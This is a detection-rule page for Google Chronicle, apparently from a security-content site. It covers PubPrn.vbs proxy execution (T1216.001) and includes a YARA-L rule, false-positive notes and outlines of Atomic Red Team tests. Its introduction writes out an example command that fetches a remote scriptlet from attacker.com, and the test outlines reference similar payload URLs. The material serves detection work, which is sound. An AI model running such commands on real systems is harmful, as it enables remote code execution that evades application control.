Detect PubPrn in Google Chronicle
Adversaries may abuse PubPrn.vbs to proxy execution of malicious remote scriptlet files. PubPrn.vbs is a Microsoft-signed Visual Basic Script located at C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs that is designed to publish printers to Active Directory Domain Services. Because the script is signed by Microsoft, it can be used to bypass application control solutions that trust Microsoft-signed code. Adversaries pass a script: URI scheme as the second parameter (e.g., pubprn.vbs 127.0.0.1 script:https://attacker.com/payload.sct) to fetch and execute a remote COM scriptlet (.sct) file via scrobj.dll. The script is typically invoked via cscript.exe or wscript.exe. Windows 10 and later versions restrict the second parameter to LDAP:// URIs, mitigating the remote code execution vector on patched systems; however, legacy environments and custom scripts may remain vulnerable.
MITRE ATT&CK
- Tactic
- Defense Evasion
- Technique
- T1216 System Script Proxy Execution
- Sub-technique
- T1216.001 PubPrn
- Canonical reference
- https://attack.mitre.org/techniques/T1216/001/
YARA-L Detection Query
rule t1216_001_pubprn_proxy_execution {
meta:
author = "Detection Engineering"
description = "Detects PubPrn.vbs proxy execution (T1216.001) via script: URI moniker or .sct COM scriptlet reference in cscript.exe or wscript.exe command line"
mitre_attack_tactic = "Defense Evasion"
mitre_attack_technique = "T1216.001"
mitre_attack_url = "https://attack.mitre.org/techniques/T1216/001/"
severity = "HIGH"
priority = "HIGH"
events:
$e.metadata.event_type = "PROCESS_LAUNCH"
$e.target.process.file.full_path = /(?i)(cscript|wscript)\.exe$/
$e.target.process.command_line = /(?i)pubprn/
(
$e.target.process.command_line = /(?i)script:/ or
$e.target.process.command_line = /(?i)\.sct/
)
match:
$e.principal.hostname over 1h
outcome:
$risk_score = max(
if($e.target.process.command_line = /(?i)script:/, 40, 0) +
if($e.target.process.command_line = /(?i)https?:\/\//, 35, 0) +
if($e.target.process.command_line = /(?i)\.sct/, 25, 0)
)
$hostname = array_distinct($e.principal.hostname)
$username = array_distinct($e.principal.user.userid)
$command_line = array_distinct($e.target.process.command_line)
$parent_process = array_distinct($e.principal.process.file.full_path)
$event_count = count_distinct($e.metadata.id)
condition:
$e
}Detects PubPrn.vbs proxy execution (T1216.001) in Google Chronicle using YARA-L 2.0 UDM events. Matches PROCESS_LAUNCH events where cscript.exe or wscript.exe is executed with pubprn in the command line alongside a script: URI moniker or .sct COM scriptlet reference. Computes a composite risk score and aggregates events per hostname over a 1-hour window.
Data Sources
Required Tables
False Positives & Tuning
- Authorized printer provisioning scripts running under service accounts in domain environments — validate principal.user.userid against known service account inventory
- Red team or penetration testing engagements that exercise PubPrn LOLBin as part of a defined test window — correlate with authorized testing schedules
- Custom enterprise VBScript wrappers that call pubprn.vbs with programmatically constructed command lines for printer fleet management — cross-reference with change management records and parent process tree
Other platforms for T1216.001
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1PubPrn Script Moniker Proxy Execution via HTTP
Expected signal: Sysmon Event ID 1: Process Create with Image=cscript.exe, CommandLine containing 'pubprn.vbs' and 'script:http://127.0.0.1:8080/payload.sct'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8080 from cscript.exe. Security Event ID 4688 with same command line if audit policy is enabled. Sysmon Event ID 7: scrobj.dll may be loaded if script: URI processing is initiated before the connection fails.
- Test 2PubPrn Execution via HTTPS with .sct Extension
Expected signal: Sysmon Event ID 1: Process Create with CommandLine containing 'pubprn.vbs', 'script:', 'https://', and '.sct'. Sysmon Event ID 22: DNS query attempt for 'localhost' from cscript.exe. Sysmon Event ID 3: Network connection attempt on port 443. Security Event ID 4688 if command line auditing is enabled.
- Test 3PubPrn via wscript.exe Instead of cscript.exe
Expected signal: Sysmon Event ID 1: Process Create with Image=wscript.exe (NOT cscript.exe), CommandLine containing 'pubprn.vbs' and 'script:http://'. Sysmon Event ID 3: Connection attempt to 127.0.0.1:9999. No console window spawned (wscript behavior). Security Event ID 4688 with full command line if auditing enabled.
- Test 4PubPrn Invocation from cmd.exe Parent (Simulated Phishing Chain)
Expected signal: Sysmon Event ID 1 (cmd.exe): Process Create for cmd.exe with /c argument. Sysmon Event ID 1 (cscript.exe): Process Create with ParentImage=cmd.exe, CommandLine containing 'pubprn.vbs script:http://'. Security Event IDs 4688 x2 for both process creations. Parent-child chain: cmd.exe -> cscript.exe visible in EDR process tree.
References (8)
- https://attack.mitre.org/techniques/T1216/001/
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/pubprn
- https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md
- https://lolbas-project.github.io/lolbas/Scripts/Pubprn/
- https://twitter.com/ItsReallyNick/status/966359744379621376
- https://learn.microsoft.com/en-us/defender-endpoint/advanced-hunting-deviceprocessevents-table
- https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon
Unlock Pro Content
Get the full detection package for T1216.001 including response playbook, investigation guide, and atomic red team tests.